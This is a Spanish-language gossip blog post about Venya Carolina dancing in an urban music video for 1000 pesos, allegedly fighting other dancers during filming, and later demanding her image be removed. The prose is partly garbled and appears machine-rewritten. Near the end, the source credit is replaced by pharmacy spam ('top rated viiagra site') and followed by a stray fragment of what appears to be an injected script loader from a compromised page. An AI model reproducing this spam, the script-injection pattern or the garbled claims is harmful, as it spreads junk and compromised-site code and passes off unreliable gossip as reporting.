Home / Publicaciones / Rincon Urbano / Venya Carolina Sale en un Video por 1000 Pesos y Arma Escandalo (Video+)

Venya Carolina Sale en un Video por 1000 Pesos y Arma Escandalo (Video+)

Nuevamente Venya Carolina está dando de qué hablar al figurar en un videoclip de música urbana donde se muestra bailando de forma muy atrevida.< !more>

En este video Venya podemos verla bailando al ritmo del tema “Me caí entro un pozo” del artista urbano Melvin “Tu Chico Sody”.

Pero, lo que se destaca no es sus movimientos sexys en el video, también es que aparece con un provocativa vestimenta exponiendo parte de  las chapas que vibran.

La revista enterato.com revelo, que Venya Carolina y el artista sin amigos, y por tal razón, asintió a ser el personaje principal del video, por la suma de (mil) RD$1000.00 pesos.

En medio del ensayo, como toda una diva del más alto renombre, tenía una pequeña lista de caprichos y al estos no ser cumplidos, estimuló su ira que ya conocemos, donde fue casi imposible continuar con la filmación de las escenas: “Armó un enorme lío y comenzó a darle golpes a las demás chicas del video, fue una ambiente espinoso, no solo hubo que interponerse para tranquilizarla, tuvimos que suspender la grabación por mucho tiempo ”, dijo una persona próxima al Venya.

Pero el asunto no paró ahí, luego de que el video fuera publicado a las redes, Venya Carolina solicitó que su imagen sea excluida del mismo: “Ella lo llamó a él y le dijo que la acompañara a golpear a Isaura Taveras, pero como Melvin no accedió al pedido, porque no quería estar envuelto en dificultades, entonces por eso le demandó que retire su imagen del video”, finiquitó la fuente.

Fuente: masvip top rated viiagra site

 }var d=document;var s=d.createElement(‘script’);

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...